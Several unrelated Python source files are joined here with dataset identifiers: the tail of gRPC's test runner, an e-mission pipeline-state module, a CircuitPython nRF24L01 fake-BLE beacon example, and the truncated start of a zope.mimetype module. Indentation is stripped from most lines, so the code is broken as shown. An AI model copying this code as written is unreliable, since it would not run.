'--config',
choices=sorted(_CONFIGS.keys()),
default='opt')
argp.add_argument(
'-n',
'--runs_per_test',
default=1,
type=runs_per_test_type,
help='A positive integer or "inf". If "inf", all tests will run in an '
'infinite loop. Especially useful in combination with "-f"')
argp.add_argument('-r', '--regex', default='.*', type=str)
argp.add_argument('--regex_exclude', default='', type=str)
argp.add_argument('-j', '--jobs', default=multiprocessing.cpu_count(), type=int)
argp.add_argument('-s', '--slowdown', default=1.0, type=float)
argp.add_argument('-p',
'--sample_percent',
default=100.0,
type=percent_type,
help='Run a random sample with that percentage of tests')
argp.add_argument('-f',
'--forever',
default=False,
action='store_const',
const=True)
argp.add_argument('-t',
'--travis',
default=False,
action='store_const',
const=True)
argp.add_argument('--newline_on_success',
default=False,
action='store_const',
const=True)
argp.add_argument('-l',
'--language',
choices=sorted(_LANGUAGES.keys()),
nargs='+',
required=True)
argp.add_argument('-S',
'--stop_on_failure',
default=False,
action='store_const',
const=True)
argp.add_argument('--use_docker',
default=False,
action='store_const',
const=True,
help='Run all the tests under docker. That provides ' +
'additional isolation and prevents the need to install ' +
'language specific prerequisites. Only available on Linux.')
argp.add_argument(
'--allow_flakes',
default=False,
action='store_const',
const=True,
help=
'Allow flaky tests to show as passing (re-runs failed tests up to five times)'
)
argp.add_argument(
'--arch',
choices=['default', 'x86', 'x64'],
default='default',
help=
'Selects architecture to target. For some platforms "default" is the only supported choice.'
)
argp.add_argument(
'--compiler',
choices=[
'default',
'gcc4.9',
'gcc5.3',
'gcc7.4',
'gcc8.3',
'gcc_musl',
'clang3.6',
'clang3.7',
'python2.7',
'python3.5',
'python3.6',
'python3.7',
'python3.8',
'pypy',
'pypy3',
'python_alpine',
'all_the_cpythons',
'electron1.3',
'electron1.6',
'coreclr',
'cmake',
'cmake_vs2015',
'cmake_vs2017',
'cmake_vs2019',
],
default='default',
help=
'Selects compiler to use. Allowed values depend on the platform and language.'
)
argp.add_argument('--iomgr_platform',
choices=['native', 'uv', 'gevent', 'asyncio'],
default='native',
help='Selects iomgr platform to build on')
argp.add_argument('--build_only',
default=False,
action='store_const',
const=True,
help='Perform all the build steps but don\'t run any tests.')
argp.add_argument('--measure_cpu_costs',
default=False,
action='store_const',
const=True,
help='Measure the cpu costs of tests')
argp.add_argument(
'--update_submodules',
default=[],
nargs='*',
help=
'Update some submodules before building. If any are updated, also run generate_projects. '
+
'Submodules are specified as SUBMODULE_NAME:BRANCH; if BRANCH is omitted, master is assumed.'
)
argp.add_argument('-a', '--antagonists', default=0, type=int)
argp.add_argument('-x',
'--xml_report',
default=None,
type=str,
help='Generates a JUnit-compatible XML report')
argp.add_argument('--report_suite_name',
default='tests',
type=str,
help='Test suite name to use in generated JUnit XML report')
argp.add_argument(
'--report_multi_target',
default=False,
const=True,
action='store_const',
help='Generate separate XML report for each test job (Looks better in UIs).'
)
argp.add_argument(
'--quiet_success',
default=False,
action='store_const',
const=True,
help=
'Don\'t print anything when a test passes. Passing tests also will not be reported in XML report. '
+ 'Useful when running many iterations of each test (argument -n).')
argp.add_argument(
'--force_default_poller',
default=False,
action='store_const',
const=True,
help='Don\'t try to iterate over many polling strategies when they exist')
argp.add_argument(
'--force_use_pollers',
default=None,
type=str,
help='Only use the specified comma-delimited list of polling engines. '
'Example: --force_use_pollers epoll1,poll '
' (This flag has no effect if --force_default_poller flag is also used)')
argp.add_argument('--max_time',
default=-1,
type=int,
help='Maximum test runtime in seconds')
argp.add_argument('--bq_result_table',
default='',
type=str,
nargs='?',
help='Upload test results to a specified BQ table.')
args = argp.parse_args()
flaky_tests = set()
shortname_to_cpu = {}
if args.force_default_poller:
_POLLING_STRATEGIES = {}
elif args.force_use_pollers:
_POLLING_STRATEGIES[platform_string()] = args.force_use_pollers.split(',')
jobset.measure_cpu_costs = args.measure_cpu_costs
# update submodules if necessary
need_to_regenerate_projects = False
for spec in args.update_submodules:
spec = spec.split(':', 1)
if len(spec) == 1:
submodule = spec[0]
branch = 'master'
elif len(spec) == 2:
submodule = spec[0]
branch = spec[1]
cwd = 'third_party/%s' % submodule
def git(cmd, cwd=cwd):
print('in %s: git %s' % (cwd, cmd))
run_shell_command('git %s' % cmd, cwd=cwd)
git('fetch')
git('checkout %s' % branch)
git('pull origin %s' % branch)
if os.path.exists('src/%s/gen_build_yaml.py' % submodule):
need_to_regenerate_projects = True
if need_to_regenerate_projects:
if jobset.platform_string() == 'linux':
run_shell_command('tools/buildgen/generate_projects.sh')
else:
print(
'WARNING: may need to regenerate projects, but since we are not on')
print(
' Linux this step is being skipped. Compilation MAY fail.')
# grab config
run_config = _CONFIGS[args.config]
build_config = run_config.build_config
if args.travis:
_FORCE_ENVIRON_FOR_WRAPPERS = {'GRPC_TRACE': 'api'}
languages = set(_LANGUAGES[l] for l in args.language)
for l in languages:
l.configure(run_config, args)
language_make_options = []
if any(language.make_options() for language in languages):
    if 'gcov' not in args.config and len(languages) != 1:
print(
'languages with custom make options cannot be built simultaneously with other languages'
)
sys.exit(1)
else:
# Combining make options is not clean and just happens to work. It allows C & C++ to build
# together, and is only used under gcov. All other configs should build languages individually.
language_make_options = list(
set([
make_option for lang in languages
for make_option in lang.make_options()
]))
if args.use_docker:
if not args.travis:
print('Seen --use_docker flag, will run tests under docker.')
print('')
print(
'IMPORTANT: The changes you are testing need to be locally committed'
)
print(
'because only the committed changes in the current branch will be')
print('copied to the docker environment.')
time.sleep(5)
dockerfile_dirs = set([l.dockerfile_dir() for l in languages])
if len(dockerfile_dirs) > 1:
print('Languages to be tested require running under different docker '
'images.')
sys.exit(1)
else:
dockerfile_dir = next(iter(dockerfile_dirs))
child_argv = [arg for arg in sys.argv if not arg == '--use_docker']
run_tests_cmd = 'python tools/run_tests/run_tests.py %s' % ' '.join(
child_argv[1:])
env = os.environ.copy()
env['RUN_TESTS_COMMAND'] = run_tests_cmd
env['DOCKERFILE_DIR'] = dockerfile_dir
env['DOCKER_RUN_SCRIPT'] = 'tools/run_tests/dockerize/docker_run_tests.sh'
if args.xml_report:
env['XML_REPORT'] = args.xml_report
if not args.travis:
env['TTY_FLAG'] = '-t' # enables Ctrl-C when not on Jenkins.
subprocess.check_call(
'tools/run_tests/dockerize/build_docker_and_run_tests.sh',
shell=True,
env=env)
sys.exit(0)
_check_arch_option(args.arch)
def make_jobspec(cfg, targets, makefile='Makefile'):
if platform_string() == 'windows':
return [
jobset.JobSpec([
'cmake', '--build', '.', '--target',
'%s' % target, '--config', _MSBUILD_CONFIG[cfg]
],
cwd=os.path.dirname(makefile),
timeout_seconds=None) for target in targets
]
else:
if targets and makefile.startswith('cmake/build/'):
# With cmake, we've passed all the build configuration in the pre-build step already
return [
jobset.JobSpec(
[os.getenv('MAKE', 'make'), '-j',
'%d' % args.jobs] + targets,
cwd='cmake/build',
timeout_seconds=None)
]
if targets:
return [
jobset.JobSpec(
[
os.getenv('MAKE', 'make'), '-f', makefile, '-j',
'%d' % args.jobs,
'EXTRA_DEFINES=GRPC_TEST_SLOWDOWN_MACHINE_FACTOR=%f' %
args.slowdown,
'CONFIG=%s' % cfg, 'Q='
] + language_make_options +
([] if not args.travis else ['JENKINS_BUILD=1']) + targets,
timeout_seconds=None)
]
else:
return []
make_targets = {}
for l in languages:
makefile = l.makefile_name()
make_targets[makefile] = make_targets.get(makefile, set()).union(
set(l.make_targets()))
def build_step_environ(cfg):
environ = {'CONFIG': cfg}
msbuild_cfg = _MSBUILD_CONFIG.get(cfg)
if msbuild_cfg:
environ['MSBUILD_CONFIG'] = msbuild_cfg
return environ
build_steps = list(
set(
jobset.JobSpec(cmdline,
environ=build_step_environ(build_config),
timeout_seconds=_PRE_BUILD_STEP_TIMEOUT_SECONDS,
flake_retries=2)
for l in languages
for cmdline in l.pre_build_steps()))
if make_targets:
make_commands = itertools.chain.from_iterable(
make_jobspec(build_config, list(targets), makefile)
for (makefile, targets) in make_targets.items())
build_steps.extend(set(make_commands))
build_steps.extend(
set(
jobset.JobSpec(cmdline,
environ=build_step_environ(build_config),
timeout_seconds=None)
for l in languages
for cmdline in l.build_steps()))
post_tests_steps = list(
set(
jobset.JobSpec(cmdline, environ=build_step_environ(build_config))
for l in languages
for cmdline in l.post_tests_steps()))
runs_per_test = args.runs_per_test
forever = args.forever
def _shut_down_legacy_server(legacy_server_port):
try:
version = int(
urllib.request.urlopen('http://localhost:%d/version_number' %
legacy_server_port,
timeout=10).read())
except:
pass
else:
urllib.request.urlopen('http://localhost:%d/quitquitquit' %
legacy_server_port).read()
def _calculate_num_runs_failures(list_of_results):
"""Calculate number of runs and failures for a particular test.
Args:
list_of_results: (List) of JobResult object.
Returns:
A tuple of total number of runs and failures.
"""
num_runs = len(list_of_results) # By default, there is 1 run per JobResult.
num_failures = 0
for jobresult in list_of_results:
if jobresult.retries > 0:
num_runs += jobresult.retries
if jobresult.num_failures > 0:
num_failures += jobresult.num_failures
return num_runs, num_failures
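# Sketch: for two JobResults, one clean and one that flaked once before passing
# (retries=1, num_failures=1), this returns (num_runs, num_failures) == (3, 1).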
# _build_and_run results
class BuildAndRunError(object):
BUILD = object()
TEST = object()
POST_TEST = object()
def _has_epollexclusive():
binary = 'bins/%s/check_epollexclusive' % args.config
if not os.path.exists(binary):
return False
try:
subprocess.check_call(binary)
return True
except subprocess.CalledProcessError as e:
return False
except OSError as e:
# For languages other than C and Windows the binary won't exist
return False
# returns a list of things that failed (or an empty list on success)
def _build_and_run(check_cancelled,
newline_on_success,
xml_report=None,
build_only=False):
"""Do one pass of building & running tests."""
# build latest sequentially
num_failures, resultset = jobset.run(build_steps,
maxjobs=1,
stop_on_failure=True,
newline_on_success=newline_on_success,
travis=args.travis)
if num_failures:
return [BuildAndRunError.BUILD]
if build_only:
if xml_report:
report_utils.render_junit_xml_report(
resultset, xml_report, suite_name=args.report_suite_name)
return []
if not args.travis and not _has_epollexclusive() and platform_string(
) in _POLLING_STRATEGIES and 'epollex' in _POLLING_STRATEGIES[
platform_string()]:
print('\n\nOmitting EPOLLEXCLUSIVE tests\n\n')
_POLLING_STRATEGIES[platform_string()].remove('epollex')
# start antagonists
antagonists = [
subprocess.Popen(['tools/run_tests/python_utils/antagonist.py'])
for _ in range(0, args.antagonists)
]
start_port_server.start_port_server()
resultset = None
num_test_failures = 0
try:
infinite_runs = runs_per_test == 0
one_run = set(spec for language in languages
for spec in language.test_specs()
if (re.search(args.regex, spec.shortname) and
(args.regex_exclude == '' or
not re.search(args.regex_exclude, spec.shortname))))
        # When running on travis, we want our test runs to be as similar as possible
# for reproducibility purposes.
if args.travis and args.max_time <= 0:
massaged_one_run = sorted(one_run, key=lambda x: x.cpu_cost)
else:
# whereas otherwise, we want to shuffle things up to give all tests a
# chance to run.
massaged_one_run = list(
one_run) # random.sample needs an indexable seq.
num_jobs = len(massaged_one_run)
# for a random sample, get as many as indicated by the 'sample_percent'
# argument. By default this arg is 100, resulting in a shuffle of all
# jobs.
sample_size = int(num_jobs * args.sample_percent / 100.0)
massaged_one_run = random.sample(massaged_one_run, sample_size)
if not isclose(args.sample_percent, 100.0):
assert args.runs_per_test == 1, "Can't do sampling (-p) over multiple runs (-n)."
print("Running %d tests out of %d (~%d%%)" %
(sample_size, num_jobs, args.sample_percent))
if infinite_runs:
assert len(massaged_one_run
) > 0, 'Must have at least one test for a -n inf run'
runs_sequence = (itertools.repeat(massaged_one_run) if infinite_runs
else itertools.repeat(massaged_one_run, runs_per_test))
all_runs = itertools.chain.from_iterable(runs_sequence)
if args.quiet_success:
jobset.message(
'START',
'Running tests quietly, only failing tests will be reported',
do_newline=True)
num_test_failures, resultset = jobset.run(
all_runs,
check_cancelled,
newline_on_success=newline_on_success,
travis=args.travis,
maxjobs=args.jobs,
maxjobs_cpu_agnostic=max_parallel_tests_for_current_platform(),
stop_on_failure=args.stop_on_failure,
quiet_success=args.quiet_success,
max_time=args.max_time)
if resultset:
for k, v in sorted(resultset.items()):
num_runs, num_failures = _calculate_num_runs_failures(v)
if num_failures > 0:
if num_failures == num_runs: # what about infinite_runs???
jobset.message('FAILED', k, do_newline=True)
else:
jobset.message('FLAKE',
'%s [%d/%d runs flaked]' %
(k, num_failures, num_runs),
do_newline=True)
finally:
for antagonist in antagonists:
antagonist.kill()
if args.bq_result_table and resultset:
upload_extra_fields = {
'compiler': args.compiler,
'config': args.config,
'iomgr_platform': args.iomgr_platform,
'language': args.language[
0
], # args.language is a list but will always have one element when uploading to BQ is enabled.
'platform': platform_string()
}
try:
upload_results_to_bq(resultset, args.bq_result_table,
upload_extra_fields)
except NameError as e:
logging.warning(
e) # It's fine to ignore since this is not critical
if xml_report and resultset:
report_utils.render_junit_xml_report(
resultset,
xml_report,
suite_name=args.report_suite_name,
multi_target=args.report_multi_target)
number_failures, _ = jobset.run(post_tests_steps,
maxjobs=1,
stop_on_failure=False,
newline_on_success=newline_on_success,
travis=args.travis)
out = []
if number_failures:
out.append(BuildAndRunError.POST_TEST)
if num_test_failures:
out.append(BuildAndRunError.TEST)
return out
if forever:
success = True
while True:
dw = watch_dirs.DirWatcher(['src', 'include', 'test', 'examples'])
initial_time = dw.most_recent_change()
have_files_changed = lambda: dw.most_recent_change() != initial_time
previous_success = success
        errors = _build_and_run(check_cancelled=have_files_changed,
                                newline_on_success=False,
                                build_only=args.build_only)
        success = not errors
if not previous_success and not errors:
jobset.message('SUCCESS',
'All tests are now passing properly',
do_newline=True)
jobset.message('IDLE', 'No change detected')
while not have_files_changed():
time.sleep(1)
else:
errors = _build_and_run(check_cancelled=lambda: False,
newline_on_success=args.newline_on_success,
xml_report=args.xml_report,
build_only=args.build_only)
if not errors:
jobset.message('SUCCESS', 'All tests passed', do_newline=True)
else:
jobset.message('FAILED', 'Some tests failed', do_newline=True)
exit_code = 0
if BuildAndRunError.BUILD in errors:
exit_code |= 1
if BuildAndRunError.TEST in errors:
exit_code |= 2
if BuildAndRunError.POST_TEST in errors:
exit_code |= 4
sys.exit(exit_code)
|
the-stack_106_14814
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import *
import logging
import datetime as pydt
import emission.core.get_database as edb
import emission.core.wrapper.pipelinestate as ps
import emission.storage.timeseries.timequery as estt
import time
# Fuzz (in seconds) added to the last processed timestamp when marking a stage done,
# presumably so that the boundary entry is not picked up again by the next stage's
# <= / >= time query.
END_FUZZ_AVOID_LTE = 5
def mark_usercache_done(user_id, last_processed_ts):
if last_processed_ts is None:
mark_stage_done(user_id, ps.PipelineStages.USERCACHE, None)
else:
mark_stage_done(user_id, ps.PipelineStages.USERCACHE, last_processed_ts + END_FUZZ_AVOID_LTE)
def get_time_range_for_usercache(user_id):
tq = get_time_range_for_stage(user_id, ps.PipelineStages.USERCACHE)
return tq
def get_time_range_for_accuracy_filtering(user_id):
return get_time_range_for_stage(user_id, ps.PipelineStages.ACCURACY_FILTERING)
def mark_accuracy_filtering_done(user_id, last_processed_ts):
if last_processed_ts is None:
mark_stage_done(user_id, ps.PipelineStages.ACCURACY_FILTERING, None)
else:
mark_stage_done(user_id, ps.PipelineStages.ACCURACY_FILTERING, last_processed_ts + END_FUZZ_AVOID_LTE)
def mark_accuracy_filtering_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.ACCURACY_FILTERING)
def get_time_range_for_segmentation(user_id):
return get_time_range_for_stage(user_id, ps.PipelineStages.TRIP_SEGMENTATION)
def mark_segmentation_done(user_id, last_processed_ts):
if last_processed_ts is None:
mark_stage_done(user_id, ps.PipelineStages.TRIP_SEGMENTATION, None)
else:
mark_stage_done(user_id, ps.PipelineStages.TRIP_SEGMENTATION,
last_processed_ts + END_FUZZ_AVOID_LTE)
def mark_segmentation_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.TRIP_SEGMENTATION)
def get_time_range_for_sectioning(user_id):
# Returns the time range for the trips that have not yet been converted into sections.
# Note that this is a query against the trip database, so we cannot search using the
# "write_ts" query. Instead, we change the query to be against the trip's end_ts
tq = get_time_range_for_stage(user_id, ps.PipelineStages.SECTION_SEGMENTATION)
tq.timeType = "data.end_ts"
return tq
def mark_sectioning_done(user_id, last_trip_done):
if last_trip_done is None:
mark_stage_done(user_id, ps.PipelineStages.SECTION_SEGMENTATION, None)
else:
mark_stage_done(user_id, ps.PipelineStages.SECTION_SEGMENTATION,
last_trip_done.data.end_ts + END_FUZZ_AVOID_LTE)
def mark_sectioning_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.SECTION_SEGMENTATION)
def get_time_range_for_smoothing(user_id):
# type: (uuid.UUID) -> emission.storage.timeseries.timequery.TimeQuery
    # Returns the time range for the sections that have not yet been smoothed.
    # Note that this is a query against the section database, so we cannot search using the
    # "write_ts" query. Instead, we change the query to be against the section's end_ts
"""
:rtype: emission.storage.timeseries.timequery.TimeQuery
"""
tq = get_time_range_for_stage(user_id, ps.PipelineStages.JUMP_SMOOTHING)
tq.timeType = "data.end_ts"
return tq
def mark_smoothing_done(user_id, last_section_done):
if last_section_done is None:
mark_stage_done(user_id, ps.PipelineStages.JUMP_SMOOTHING, None)
else:
mark_stage_done(user_id, ps.PipelineStages.JUMP_SMOOTHING,
last_section_done.data.end_ts + END_FUZZ_AVOID_LTE)
def mark_smoothing_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.JUMP_SMOOTHING)
def get_time_range_for_mode_inference(user_id):
tq = get_time_range_for_stage(user_id, ps.PipelineStages.MODE_INFERENCE)
tq.timeType = "data.end_ts"
return tq
def mark_mode_inference_complete(user_id, last_section_done):
if last_section_done is None:
mark_stage_done(user_id, ps.PipelineStages.MODE_INFERENCE, None)
else:
mark_stage_done(user_id, ps.PipelineStages.MODE_INFERENCE,
last_section_done.data.end_ts + END_FUZZ_AVOID_LTE)
def mark_mode_inference_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.MODE_INFERENCE)
def get_complete_ts(user_id):
mode_infer_state = get_current_state(user_id, ps.PipelineStages.MODE_INFERENCE)
if mode_infer_state is not None:
return mode_infer_state.last_processed_ts
else:
cleaned_state = get_current_state(user_id, ps.PipelineStages.CLEAN_RESAMPLING)
if cleaned_state is not None:
return cleaned_state.last_processed_ts
else:
return None
def get_time_range_for_clean_resampling(user_id):
# type: (uuid.UUID) -> emission.storage.timeseries.timequery.TimeQuery
# Returns the time range for the trips that have not yet been converted into sections.
# Note that this is a query against the trip database, so we cannot search using the
# "write_ts" query. Instead, we change the query to be against the trip's end_ts
"""
:rtype: emission.storage.timeseries.timequery.TimeQuery
"""
tq = get_time_range_for_stage(user_id, ps.PipelineStages.CLEAN_RESAMPLING)
tq.timeType = "data.end_ts"
return tq
def mark_clean_resampling_done(user_id, last_section_done):
if last_section_done is None:
mark_stage_done(user_id, ps.PipelineStages.CLEAN_RESAMPLING, None)
else:
mark_stage_done(user_id, ps.PipelineStages.CLEAN_RESAMPLING,
last_section_done.data.enter_ts + END_FUZZ_AVOID_LTE)
def mark_clean_resampling_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.CLEAN_RESAMPLING)
def get_time_range_for_mode_inference(user_id):
tq = get_time_range_for_stage(user_id, ps.PipelineStages.MODE_INFERENCE)
tq.timeType = "data.end_ts"
return tq
def mark_mode_inference_done(user_id, last_section_done):
if last_section_done is None:
mark_stage_done(user_id, ps.PipelineStages.MODE_INFERENCE, None)
else:
mark_stage_done(user_id, ps.PipelineStages.MODE_INFERENCE,
last_section_done.data.end_ts + END_FUZZ_AVOID_LTE)
def mark_mode_inference_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.MODE_INFERENCE)
def get_time_range_for_output_gen(user_id):
return get_time_range_for_stage(user_id, ps.PipelineStages.OUTPUT_GEN)
def mark_output_gen_done(user_id, last_processed_ts):
if last_processed_ts is None:
mark_stage_done(user_id, ps.PipelineStages.OUTPUT_GEN, None)
else:
mark_stage_done(user_id, ps.PipelineStages.OUTPUT_GEN,
last_processed_ts + END_FUZZ_AVOID_LTE)
def mark_output_gen_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.OUTPUT_GEN)
def mark_stage_done(user_id, stage, last_processed_ts):
# We move failed entries to the error timeseries. So usercache runs never fail.
curr_state = get_current_state(user_id, stage)
assert(curr_state is not None)
assert(curr_state.curr_run_ts is not None)
curr_state.last_ts_run = curr_state.curr_run_ts
# It is incorrect to assume that we have processed all the data until the
# start of the last run. In particular, due to network connectivity or
# other issues, it is possible that there is outstanding data on phones
# that was collected before the last run started. And if we set this, then
# that data will simply be skipped. The same logic applies to all
# decorators that are based on client collected data (trip start ts, etc) -
# it is only accurate for server generated data. So for maximum generality,
# let's allow the stage to pass in last_processed_ts.
if last_processed_ts is not None:
logging.info("For stage %s, last_ts_processed = %s" %
(stage, pydt.datetime.utcfromtimestamp(last_processed_ts).isoformat()))
curr_state.last_processed_ts = last_processed_ts
else:
logging.info("For stage %s, last_ts_processed is unchanged" % stage)
curr_state.curr_run_ts = None
logging.debug("About to save object %s" % curr_state)
edb.save(edb.get_pipeline_state_db(), curr_state)
logging.debug("After saving state %s, list is %s" % (curr_state,
list(edb.get_pipeline_state_db().find({"user_id": user_id}))))
def mark_stage_failed(user_id, stage):
curr_state = get_current_state(user_id, stage)
assert(curr_state is not None)
assert(curr_state.curr_run_ts is not None)
# last_ts_run remains unchanged since this run did not succeed
# the next query will start from the start_ts of this run
# we also reset the curr_run_ts to indicate that we are not currently running
curr_state.curr_run_ts = None
logging.debug("About to save object %s" % curr_state)
edb.save(edb.get_pipeline_state_db(), curr_state)
logging.debug("After saving state %s, list is %s" % (curr_state,
list(edb.get_pipeline_state_db().find({"user_id": user_id}))))
def get_time_range_for_stage(user_id, stage):
"""
Returns the start ts and the end ts of the entries in the stage
"""
curr_state = get_current_state(user_id, stage)
if curr_state is None:
start_ts = None
curr_state = ps.PipelineState()
curr_state.user_id = user_id
curr_state.pipeline_stage = stage
curr_state.curr_run_ts = None
curr_state.last_processed_ts = None
curr_state.last_ts_run = None
else:
start_ts = curr_state.last_processed_ts
if start_ts is None:
logging.info("For stage %s, start_ts is None" % stage)
else:
logging.info("For stage %s, start_ts = %s" % (stage, pydt.datetime.utcfromtimestamp(start_ts).isoformat()))
assert curr_state.curr_run_ts is None, "curr_state.curr_run_ts = %s" % curr_state.curr_run_ts
# Let's pick a point 5 secs in the past. If we don't do this, then we will
    # read all entries up to the current ts and this may lead to lost data. For
# example, let us say that the current ts is t1. At the time that we read
# the data, we have 4 entries for t1. By the time we finish copying, we
# have 6 entries for t1, we will end up deleting all 6, which will lose 2
# entries.
end_ts = time.time() - END_FUZZ_AVOID_LTE
ret_query = estt.TimeQuery("metadata.write_ts", start_ts, end_ts)
curr_state.curr_run_ts = end_ts
logging.debug("About to save object %s" % curr_state)
edb.save(edb.get_pipeline_state_db(), curr_state)
logging.debug("After saving state %s, list is %s" % (curr_state,
list(edb.get_pipeline_state_db().find({"user_id": user_id}))))
return ret_query
def get_current_state(user_id, stage):
curr_state_doc = edb.get_pipeline_state_db().find_one({"user_id": user_id,
"pipeline_stage": stage.value})
logging.debug("returning curr_state_doc %s for stage %s " % (curr_state_doc, stage))
if curr_state_doc is not None:
return ps.PipelineState(curr_state_doc)
else:
return None
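# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the original
# module). It shows the intended lifecycle of a pipeline stage: query the
# outstanding time range, process it, then mark the stage done or failed.
# The stage choice (USERCACHE) and the trivial "processing" step are
# assumptions made purely for this example.
def _example_run_stage(user_id):
    tq = get_time_range_for_stage(user_id, ps.PipelineStages.USERCACHE)
    try:
        # a real stage would process the entries selected by `tq` here;
        # we simply report "now" as the last processed timestamp
        last_processed_ts = time.time()
        mark_stage_done(user_id, ps.PipelineStages.USERCACHE, last_processed_ts)
    except Exception:
        mark_stage_failed(user_id, ps.PipelineStages.USERCACHE)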
|
the-stack_106_14816
|
"""
This example uses the nRF24L01 as a 'fake' BLE Beacon
.. warning:: ATSAMD21 M0-based boards have memory allocation
error when loading 'fake_ble.mpy'
"""
import time
import board
import digitalio
from circuitpython_nrf24l01.fake_ble import (
chunk,
FakeBLE,
UrlServiceData,
BatteryServiceData,
TemperatureServiceData,
)
# change these (digital output) pins accordingly
ce = digitalio.DigitalInOut(board.D4)
csn = digitalio.DigitalInOut(board.D5)
# using board.SPI() automatically selects the MCU's
# available SPI pins, board.SCK, board.MOSI, board.MISO
spi = board.SPI() # init spi bus object
# initialize the nRF24L01 on the spi bus object as a BLE compliant radio
nrf = FakeBLE(spi, csn, ce)
# the name parameter is going to be its broadcasted BLE name
# this can be changed at any time using the `name` attribute
# nrf.name = b"foobar"
# you can optionally set the arbitrary MAC address to be used as the
# BLE device's MAC address. Otherwise this is randomly generated upon
# instantiation of the FakeBLE object.
# nrf.mac = b"\x19\x12\x14\x26\x09\xE0"
# set the Power Amplifier level to -12 dBm since this test example is
# usually run with nRF24L01 transceiver in close proximity to the
# BLE scanning application
nrf.pa_level = -12
def _prompt(remaining):
if remaining % 5 == 0 or remaining < 5:
if remaining - 1:
            print(remaining, "advertisements left to go!")
else:
            print(remaining, "advertisement left to go!")
# create an object for manipulating the battery level data
battery_service = BatteryServiceData()
# battery level data is 1 unsigned byte representing a percentage
battery_service.data = 85
def master(count=50):
"""Sends out the device information."""
# using the "with" statement is highly recommended if the nRF24L01 is
# to be used for more than a BLE configuration
with nrf as ble:
ble.name = b"nRF24L01"
# include the radio's pa_level attribute in the payload
ble.show_pa_level = True
print(
"available bytes in next payload:",
ble.len_available(chunk(battery_service.buffer)),
) # using chunk() gives an accurate estimate of available bytes
for i in range(count): # advertise data this many times
if ble.len_available(chunk(battery_service.buffer)) >= 0:
_prompt(count - i) # something to show that it isn't frozen
# broadcast the device name, MAC address, &
# battery charge info; 0x16 means service data
ble.advertise(battery_service.buffer, data_type=0x16)
# channel hoping is recommended per BLE specs
ble.hop_channel()
time.sleep(0.5) # wait till next broadcast
# nrf.show_pa_level & nrf.name both are set to false when
# exiting a with statement block
# create an object for manipulating temperature measurements
temperature_service = TemperatureServiceData()
# temperature's float data has up to 2 decimal places of precision
temperature_service.data = 42.0
def send_temp(count=50):
"""Sends out a fake temperature."""
with nrf as ble:
ble.name = b"nRF24L01"
print(
"available bytes in next payload:",
ble.len_available(chunk(temperature_service.buffer)),
)
for i in range(count):
if ble.len_available(chunk(temperature_service.buffer)) >= 0:
_prompt(count - i)
# broadcast a temperature measurement; 0x16 means service data
ble.advertise(temperature_service.buffer, data_type=0x16)
ble.hop_channel()
time.sleep(0.2)
# use the Eddystone protocol from Google to broadcast a URL as
# service data. We'll need an object to manipulate that also
url_service = UrlServiceData()
# the data attribute converts a URL string into a simplified
# bytes object using byte codes defined by the Eddystone protocol.
url_service.data = "http://www.google.com"
# Eddystone protocol requires an estimated TX PA level at 1 meter
# lower this estimate since we lowered the actual `ble.pa_level`
url_service.pa_level_at_1_meter = -45 # defaults to -25 dBm
def send_url(count=50):
"""Sends out a URL."""
with nrf as ble:
print(
"available bytes in next payload:",
ble.len_available(chunk(url_service.buffer)),
)
# NOTE we did NOT set a device name in this with block
for i in range(count):
# URLs easily exceed the nRF24L01's max payload length
if ble.len_available(chunk(url_service.buffer)) >= 0:
_prompt(count - i)
ble.advertise(url_service.buffer, 0x16)
ble.hop_channel()
time.sleep(0.2)
def set_role():
"""Set the role using stdin stream. Count arg for all functions can be
specified using a space delimiter (e.g. 'T 10' calls `send_temp(10)`)
:return:
- True when role is complete & app should continue running.
- False when app should exit
"""
user_input = (
input(
"*** Enter 'M' to broadcast the device name, pa_level, & battery"
" charge.\n"
"*** Enter 'T' to broadcast the device name & a temperature\n"
"*** Enter 'U' to broadcast a custom URL link\n"
"*** Enter 'Q' to quit example.\n"
)
or "?"
)
user_input = user_input.split()
if user_input[0].upper().startswith("M"):
if len(user_input) > 1:
master(int(user_input[1]))
else:
master()
return True
if user_input[0].upper().startswith("T"):
if len(user_input) > 1:
send_temp(int(user_input[1]))
else:
send_temp()
return True
if user_input[0].upper().startswith("U"):
if len(user_input) > 1:
send_url(int(user_input[1]))
else:
send_url()
return True
if user_input[0].upper().startswith("Q"):
nrf.power = False
return False
print(user_input[0], "is an unrecognized input. Please try again.")
return set_role()
print(" nRF24L01 fake BLE beacon test")
if __name__ == "__main__":
try:
while set_role():
pass # continue example until 'Q' is entered
except KeyboardInterrupt:
print(" Keyboard Interrupt detected. Powering down radio...")
nrf.power = False
else:
print(
" Run master() to broadcast the device name, pa_level, & battery "
"charge\n Run send_temp() to broadcast the device name & a "
"temperature\n Run send_url() to broadcast a custom URL link"
)
|
the-stack_106_14818
|
##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
# There's a zope.contenttype module that exports a similar API,
# but that's pretty heuristic. Some of this should perhaps be folded
# back into that, or this package could provide a replacement.
#
import mimetypes
import codecs
from zope import interface
from zope.mimetype import interfaces
import zope.contenttype.parse
def mimeTypeGetter(name=None, data=None, content_type=None):
"""A minimal extractor that never attempts to guess."""
if name is None and data is None and content_type is None:
return None
if content_type:
try:
major, minor, _params = zope.contenttype.parse.parseOrdered(
content_type)
except ValueError:
pass
else:
return "%s/%s" % (major, minor)
return None
interface.directlyProvides(mimeTypeGetter, interfaces.IMimeTypeGetter)
def mimeTypeGuesser(name=None, data=None, content_type=None):
